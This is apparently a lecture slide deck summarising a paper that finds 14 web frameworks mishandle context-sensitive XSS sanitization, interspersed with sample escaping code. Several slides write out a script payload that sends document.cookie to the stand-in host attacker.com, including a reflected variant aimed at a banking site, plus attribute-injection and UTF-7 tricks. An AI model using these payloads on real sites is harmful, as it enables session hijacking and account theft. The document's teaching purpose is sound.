THE BROKEN WEB A Systematic Analysis of XSS Sanitization in Web Application Frameworks


Page 1: THE BROKEN WEB

THE BROKEN WEB
A Systematic Analysis of XSS Sanitization in Web Application Frameworks

Page 2: THE BROKEN WEB

Executive summary

• Web page processing analyzed in detail
• Sanitization is quite complex
  • Context sensitive
• 14 web frameworks analyzed
  • None handle sanitization properly
  • In some cases they give a false sense of security because the algorithm is wrong

Page 3: THE BROKEN WEB

HTTP background: Basic HTTP operation

• Client sends request to server

GET www.example.com/sample.html

• Server locates and sends back file

www.example.com:/sample.html

<h1>Sample file</h1>
<p>This is a sample</p>

• Client displays file

Sample file

This is a sample

Page 4: THE BROKEN WEB

HTTP background: Server side scripting

• Client sends request

GET www.example.com/sample.php

• Server executes script

Sample.php:

<?php
echo '<h1>Sample file</h1>';
echo '<p>This is a sample</p>';
?>

• Server returns generated file

<h1>Sample file</h1>
<p>This is a sample</p>

• Client displays file

Sample file

This is a sample

Page 5: THE BROKEN WEB

HTTP background: Form management

• User fills in fields and presses 'Submit'

Please send me your important financial information:

Name: Mr. Dummy
Soc: 234-23-5555
Credit card number: 1234-1234-1234-1234

SUBMIT

• Client sends data to server

POST www.example.com/sample.php?name=Mr. Dummy&soc=234-23-5555&credit=1234-1234-1234-1234

• Server executes script

Sample.php:

<?php
# save data somewhere...
echo '<p>Now I own you.</p>';
?>

• Server sends response page to client

Now I own you.

Page 6: THE BROKEN WEB

HTTP background: Client side scripting

The server sends a page that contains a script:

<html><body>

<h1>My First Web Page</h1>

<script type="text/javascript">document.write("<p>" + Date() + "</p>");</script>

</body></html>

Page 7: THE BROKEN WEB

HTTP background: Client side scripting

After the browser runs the script, the page is equivalent to:

<html><body>

<h1>My First Web Page</h1>

<p>Tue Feb 28 2012 14:28:07 GMT-0500 (EST)</p>

</body></html>

Page 8: THE BROKEN WEB

HTTP background: Client side scripting

The browser displays:

My First Web Page

Tue Feb 28 2012 14:28:07 GMT-0500 (EST)

Page 9: THE BROKEN WEB

XSS attack

Server side code prints text entered by a user in an earlier session. Consider this code:

<?php
echo '<p>Note from ' . $user . '</p>';
echo '<p>' . $note . '</p>';
?>

Suppose $note contains

<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>The sky is falling.

Page 10: THE BROKEN WEB

XSS attack

The result is that the following is sent to your browser:

<p>Note from Mr. Apocalypse</p>
<p><script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>The sky is falling.</p>

Page 11: THE BROKEN WEB

XSS attack

Your browser displays the following:

Note from Mr. Apocalypse

[img] The sky is falling.

And the attacker has gotten your cookie.

Page 12: THE BROKEN WEB

XSS attack

The attacker simply needed to enter this script on the screen used to post the note.

Logged in as: Mr. Apocalypse

Text of message to post:
<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>The sky is falling._______

Any website that echoes user input back without sanitizing it can be used for an XSS attack.

Page 13: THE BROKEN WEB

XSS attack

• The following can be used to obtain the cookie for your bank account:

<script>document.location='http://banking.com/search?name=<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>'</script>

Page 14: THE BROKEN WEB

Sanitization

One solution is to escape sensitive characters:

<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>

becomes

&lt;script&gt;document.write("&lt;img src=http://attacker.com/" + document.cookie + "&gt;")&lt;/script&gt;

Problem: sanitization needs to be done in a context-sensitive manner, and the rules are very complex.
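As a minimal sketch of the escaping step above (JavaScript for Node.js; the helper name `escapeHtml` and the `stealCookie()` payload are assumptions for illustration, not taken from the paper or any framework), the following replaces the characters that are special in HTML element content. It is only suitable for the HTML body context, which is the limitation this slide points out.

```javascript
// Sketch only: escapes text for the HTML element-content context.
// escapeHtml is a hypothetical helper, not a framework API.
function escapeHtml(text) {
  const replacements = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  };
  return String(text).replace(/[&<>"']/g, (ch) => replacements[ch]);
}

const note = "<script>stealCookie()</script>The sky is falling.";
// The markup characters are neutralized, so the browser shows the note as text.
console.log("<p>" + escapeHtml(note) + "</p>");
```

Escaping "&" as well matters: without it, text that already contains an entity would be decoded into something different from what the user typed.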

Page 15: THE BROKEN WEB

Web page parsing

Page 16: THE BROKEN WEB

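Challenge 1: context sensitivity

Consider this code:

echo '<p>' . $note . '</p>';

Here one can replace '<' with &lt; and '>' with &gt; to block attacks. However, consider:

echo '<img src=' . $url . '>';

Consider the following url:

picture.jpg' onLoad='document.location=…'

This value contains neither '<' nor '>', so that escaping leaves it unchanged, yet it adds an onLoad handler to the img tag.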
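The difference between the two contexts can be sketched as follows (JavaScript for Node.js; all function names and the `stealCookie()` payload are hypothetical). The first helper is the angle-bracket escaping that suffices inside a paragraph; the second escapes quotes as well and is paired with a quoted attribute. This is one possible approach under those assumptions, not the method of any particular framework.

```javascript
// Sketch only: all function names and the stealCookie() payload are hypothetical.

// Escapes only angle brackets, as suggested for the <p> case.
function escapeAngleBrackets(text) {
  return String(text).replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Escapes every character that could end a quoted attribute value.
function escapeAttribute(text) {
  const replacements = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  };
  return String(text).replace(/[&<>"']/g, (ch) => replacements[ch]);
}

// Always quote the attribute; an unquoted value can be ended by a space.
function imgTag(url) {
  return '<img src="' + escapeAttribute(url) + '">';
}

const url = "picture.jpg' onLoad='stealCookie()";
console.log(escapeAngleBrackets(url) === url); // true: the payload passes through untouched
console.log(imgTag(url));
```

Attribute escaping does not address dangerous URL schemes such as javascript:, which need a separate check.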

Page 17: THE BROKEN WEB

Challenge 2: Sanitizing nested contexts

Consider this piece of PHP code:

echo '<script> var x = ' . $UNTRUSTED_DATA . '...</script>';

The sanitizer must block both a </script> sequence, which ends the script block for the HTML parser, and a ' character, which ends a string literal for the JavaScript parser.
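A minimal sketch of handling both layers at once, assuming the untrusted value is meant to become a JavaScript string (JavaScript for Node.js; `toScriptStringLiteral` and the `stealCookie()` payload are hypothetical names). `JSON.stringify` produces a quoted, escaped string literal for the JavaScript layer, and the extra replacements remove the characters the HTML parser reacts to inside a script block.

```javascript
// Sketch only: toScriptStringLiteral is a hypothetical helper.
function toScriptStringLiteral(value) {
  return JSON.stringify(String(value)) // JavaScript layer: quotes and backslashes
    .replace(/</g, "\\u003c")          // HTML layer: no "</script>" or "<!--" can appear
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")     // line separators, which older JavaScript
    .replace(/\u2029/g, "\\u2029");    // engines treat as line terminators
}

const untrusted = "</script><script>stealCookie()</script>";
console.log("<script> var x = " + toScriptStringLiteral(untrusted) + "; </script>");
```

The output keeps the value inside one string literal: the only closing script tag in the printed line is the one the template itself wrote.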

Page 18: THE BROKEN WEB

Challenge 3: Browser transductions

Consider:

<div class='comment-box' onclick='displayComment(" UNTRUSTED",this)'> ... hidden comment ... </div>

Even if every " character is replaced with &quot;, the HTML5 parser decodes the entity before passing the text to JavaScript.
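The decoding step can be imitated outside a browser. In the sketch below (JavaScript for Node.js), `decodeAttributeEntities` is a deliberately simplified stand-in for the parser's handling of character references, and `escapeForJsString` and `stealCookie()` are hypothetical names. It shows why HTML escaping alone fails here, and one possible ordering that holds up: escape for JavaScript first, using sequences that HTML decoding leaves alone.

```javascript
// Sketch only: simplified stand-in for the HTML parser's decoding of
// character references in an attribute value. All names are hypothetical.
function decodeAttributeEntities(value) {
  return value
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&amp;/g, "&"); // decoded last to avoid double decoding
}

// Escapes for a JavaScript string literal using only \uXXXX sequences,
// which contain no characters that are special in HTML.
function escapeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

const untrusted = '"); stealCookie(); ("';

// HTML escaping alone: the parser undoes it before JavaScript runs.
const htmlEscapedOnly = 'displayComment("' + untrusted.replace(/"/g, "&quot;") + '",this)';
console.log(decodeAttributeEntities(htmlEscapedOnly));
// displayComment(""); stealCookie(); ("",this)

// JavaScript escaping first: decoding changes nothing and the string stays closed.
const jsEscaped = 'displayComment("' + escapeForJsString(untrusted) + '",this)';
console.log(decodeAttributeEntities(jsEscaped) === jsEscaped); // true
```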

Page 19: THE BROKEN WEB

Challenge 4: Dynamic code

Consider this program:

function foo(untrusted) {
  document.write("<input onclick='foo(" + untrusted + ")' >");
}

Evaluating the function generates HTML that calls the same function again.

Page 20: THE BROKEN WEB

Challenge 5: Character set issues

+ADw- maps to < in UTF-7

The sanitizer needs to recognize the character set conversion.
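To see why +ADw- is dangerous, the sketch below decodes UTF-7 shifted runs by hand (JavaScript for Node.js, relying on its `Buffer` global; `decodeUtf7Runs` and the `stealCookie()` payload are hypothetical names). It is a simplification: it only handles runs that end with an explicit "-", whereas real UTF-7 also allows other characters to end a run.

```javascript
// Sketch only: decodes the "+...-" runs used by UTF-7, where the part
// between "+" and "-" is base64-encoded UTF-16BE text.
function decodeUtf7Runs(text) {
  return text.replace(/\+([A-Za-z0-9+/]*)-/g, (match, b64) => {
    if (b64 === "") return "+"; // "+-" encodes a literal plus sign
    const bytes = Buffer.from(b64, "base64");
    let out = "";
    for (let i = 0; i + 1 < bytes.length; i += 2) {
      out += String.fromCharCode((bytes[i] << 8) | bytes[i + 1]);
    }
    return out;
  });
}

const input = "+ADw-script+AD4-stealCookie()+ADw-/script+AD4-";
console.log(input.includes("<")); // false: a filter looking for "<" sees nothing
console.log(decodeUtf7Runs(input)); // <script>stealCookie()</script>
```

A sanitizer that inspects the raw bytes passes this input, while a browser that interprets the page as UTF-7 sees a script tag. Declaring the character set explicitly in the response is the usual way to keep both sides in agreement.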

Page 21: THE BROKEN WEB

Challenge 6: everything else

• MIME based XSS
• Browser bugs
• Capability leaks
• Parsing inconsistencies
• Browser extensions
• Adobe Flash is fairly buggy

Page 22: THE BROKEN WEB

Evaluation of web frameworks and applications

• Subjects
  • 14 popular web application frameworks
  • 8 popular PHP applications
• Evaluation
  • Auto-sanitization and/or sanitization libraries
  • Dynamic sanitization handling

Page 23: THE BROKEN WEB

Auto sanitization

• 7 of 14 support auto sanitization
• 4 of these 7 perform context-insensitive sanitization, which is inherently unsafe
• 14.8%-33.6% of output sinks fail to be protected by auto sanitization in 10 popular Django applications

Page 24: THE BROKEN WEB

Context sensitive sanitization

• Performed by 3 of 7 frameworks
  • GWT, Google Clearsilver, and Google Ctemplate
• Involved a runtime parser that checked the context and applied the appropriate sanitization function
• User needs to mark untrusted variables
• No detailed analysis of reliability
  • I assume they worked reasonably well
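The idea of choosing a sanitization function by context can be sketched as a lookup table (JavaScript for Node.js). The context names, the sanitizer bodies, and `sanitizeFor` are illustrative assumptions and do not reflect how GWT, Clearsilver, or Ctemplate are implemented. In particular, this sketch is told the context by the caller, whereas the frameworks above determine it with a parser.

```javascript
// Sketch only: context names and sanitizer bodies are illustrative assumptions.
const htmlReplacements = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

const sanitizers = new Map([
  // Text between tags: markup characters only.
  ["htmlBody", (s) => s.replace(/[&<>]/g, (ch) => htmlReplacements[ch])],
  // Quoted attribute values: quotes must be escaped as well.
  ["htmlAttribute", (s) => s.replace(/[&<>"']/g, (ch) => htmlReplacements[ch])],
  // String literal inside a script block: JSON quoting plus HTML-safe escapes.
  ["jsString", (s) => JSON.stringify(s).replace(/[<>&]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"))],
]);

// Fails closed: an unknown context is an error, never a silent pass-through.
function sanitizeFor(context, value) {
  const sanitizer = sanitizers.get(context);
  if (sanitizer === undefined) {
    throw new Error("No sanitizer for context: " + context);
  }
  return sanitizer(String(value));
}

console.log(sanitizeFor("htmlBody", "<b>bold</b>"));
console.log(sanitizeFor("htmlAttribute", "x' onLoad='y"));
console.log(sanitizeFor("jsString", "</script>"));
```

Throwing on an unknown context is a deliberate choice in this sketch: falling back to a generic HTML escaper is the context-insensitive behavior that the auto sanitization slide calls unsafe.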

Page 25: THE BROKEN WEB

Manual sanitization

• Prone to error
  • Variables missed
  • Wrong sanitization function used

Page 26: THE BROKEN WEB

Dynamic code evaluation

• Perform appropriate runtime checks before printing untrusted strings
• Generally not supported by frameworks
• Four frameworks provided static sanitization of untrusted strings within the context of JavaScript constants

Page 27: THE BROKEN WEB

DOM based errors

• JavaScript can reference the content of a web page

<h1>This page changes itself</h1>
<a name="xxx">Original content</a>
<script>document.anchors[0].innerHTML="New content";</script>

Page 28: THE BROKEN WEB

DOM based errors

• JavaScript can reference the content of a web page

After the script runs, the anchor holds the new content:

<h1>This page changes itself</h1>
<a name="xxx">New content</a>
<script>document.anchors[0].innerHTML="New content";</script>

Page 29: THE BROKEN WEB

DOM based errors

• Consider this code:

text = element.getAttribute('title');
// ... elided ...
desc = create_element('span', 'bottom');
desc.innerHTML = text;
tooltip.appendChild(desc);

This code reads an attribute from the HTML, which removes the escaping, and reinserts the text elsewhere as markup.

To avoid the bug: use innerText to write, or innerHTML to read.
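A minimal sketch of the "write as text" fix, under stated assumptions (JavaScript; `buildDescription` is a hypothetical name, and the second argument of the slide's `create_element` is assumed to be a class name). It uses `textContent`, the standard DOM property that, like `innerText`, inserts a string as text on write. The stand-in objects at the end only exist so the sketch runs under Node.js without a DOM; in a browser one would pass `document` and a real element.

```javascript
// Sketch only. `doc` is anything with createElement(); in a browser, pass `document`.
function buildDescription(doc, element) {
  const text = element.getAttribute("title"); // entities are already decoded here
  const desc = doc.createElement("span");
  desc.className = "bottom"; // assumed meaning of create_element's second argument
  desc.textContent = text;   // written as text, so it is never parsed as markup
  return desc;
}

// Stand-in objects so the sketch also runs under Node.js without a DOM.
const fakeDocument = { createElement: (tag) => ({ tagName: tag }) };
const fakeElement = { getAttribute: () => "<img src=x onerror=stealCookie()>" };

const desc = buildDescription(fakeDocument, fakeElement);
console.log(desc.textContent);
```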

Page 30: THE BROKEN WEB

DOM based errors

• Ignored by frameworks
• Cause many XSS vulnerabilities

Page 31: THE BROKEN WEB

Expressiveness of contexts in web applications

• 8 PHP applications analyzed
  • 19-532 KLOC
• All applications emit untrusted data into all contexts
• Applications sometimes employ different sanitizers for the same context
• General conclusion: frameworks do not provide sufficient sanitization support

Page 32: THE BROKEN WEB

Manual sanitization expressiveness

• 9 of 14 frameworks do not support contexts other than generic HTML
• 4 provided sanitizers for JavaScript string context
• 1 framework provided a sanitizer for JavaScript number and boolean contexts
• None allow for sanitization of JavaScript code
• Only one framework allowed customization of the sanitizer within a context; the others had a pre-packaged sanitizer for all contexts

Page 33: THE BROKEN WEB

Correctness of sanitizers

• Sanitizers prone to error
• In frameworks they usually work on a "whitelist" model in which only structures following specific patterns are allowed
• One framework uses a "blacklist" model in which specific strings are forbidden
• Frameworks rely on a canonical form into which all output is formatted to simplify sanitizers
• The authors conclude that the "whitelist" approach should be researched. The "blacklist" approach is too error prone.

Page 34: THE BROKEN WEB

Related work

• XSS analysis and defense
  • Server side code errors
  • JavaScript code errors
  • Research identifies vulnerabilities
    • Untrusted data showing up in output
    • Improper sanitization
  • Server side solutions
    • BLUEPRINT, SCRIPTGARD, XSS-GUARD
    • Formalize web model to design sanitizers
  • Client side
    • XSS-Auditor
    • Analyze browser reference patterns to try and identify attacks
    • Does not separate trusted and untrusted data
• Studies in sanitizer correctness
  • Manual process of adding sanitization is error prone
  • None provide a good underlying model for sanitizers
• Taint tracking and security typed languages

Page 35: THE BROKEN WEB

Paper's conclusions

• Current frameworks do not properly manage sanitization
• The paper suggests a future direction of producing a formal model of the browser's behavior

Page 36: THE BROKEN WEB

Some later work

• Saxena developed PHP analysis tools
• Model checker: symbolic execution of PHP to try and find dangerous code
• Static analysis: tries to identify and incorporate sanitizers based on the context of a print
  • Probably the better approach
  • Needs to be integrated with some sort of dynamic analysis

Page 37: THE BROKEN WEB

Discussion questions

• What is the best approach for solving XSS?

• In addition to technical issues, what practical issues need to be addressed to get a solution deployed? For example, asking everyone to rewrite their PHP code is going to be difficult.

• Should the government get involved in regulating web sites to make sure basic protection standards are upheld?

Page 38: THE BROKEN WEB

XSS attack game

• 2 teams
• Source code available from www.cs.jhu.edu/~roe
• Look for $_GET and $_POST variables for user input
• Use MAMP to run